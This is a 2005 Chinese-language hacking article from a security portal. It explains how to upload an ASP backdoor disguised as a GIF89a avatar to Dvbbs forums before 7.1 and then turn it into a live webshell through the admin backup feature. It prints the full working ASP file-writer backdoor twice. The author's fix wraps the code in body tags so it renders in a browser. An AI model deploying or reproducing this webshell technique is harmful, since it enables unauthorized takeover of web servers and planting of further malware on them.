首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
GIF89a结合动网后台(7.1以前)取得webshell的完整解释
来源:http://www.powers.com.cn 作者:powers 发布时间:2005-04-13  

GIF89a结合动网后台(7.1以前)取得webshell的完整解释

来源:http://www.powers.com.cn

背景:
(1)动网上传文件,备份得到后门
(2)使用GIF89a可以上传内容为木马的gif图片:逃过头像上传的检测。
所以产生了新的方法:上传gif头像图片,备份得到木马了。(使用范围为:动网7.1以前的版本)

但是很多人在执行后门后出现的是一张不能显示的图片.

偶还是公布一下我用了恩久的更方便的方法,同时解释一下为什么会出现这种情况.:
就是GIF89a加站长助手,运行后门的时候看到的就是站长助手的界面,唯一的不同就是左上角多了GIF89a几个字。这个方法在一看到背景(2)就用在一个论坛的测试上了。。呵呵

gif内容如下:
-----以下为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)----
GIF89a
<%
'站长助手的内容...省略...
%>
</body>
</center>
-----以上为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)----

其实真正问题是这样的:
执行由gif文件恢复过来的asp,最后显示成一张不能显示的图片:
其实这个过程有两个:
(1)asp解释执行
(2)你的浏览器的显示.
(1)是没有问题.
现在问题是出在你的(2)上面的.
(2)出问题的原因是浏览器的解释问题.
解决办法:只要把显示的代码放到<body></body>之间就可以了.
本来是这样的:执行后显示一张不能显示的图片.
GIF89a
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>

修改后:执行正常了。.后门就正常使用了。.哈哈

GIF89a
<body>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
</body>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·一种新的穿透防火墙的数据传输技
·细说暴库的原理与方法
·在Windows 2003中HOOK ZwCreateP
·SQL Server提升权限相关命令及防
·管理员组获取系统权限的完美解决
·php注入专题
·再谈Radmin——对“自己丰衣足食
·IPB漏洞再现江湖
·在TCP三次握手后插入伪造的TCP包
·破译动网验证码的简单方法
·再谈防火墙及防火墙的渗透
·Man-in-the-middle-attacks In P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved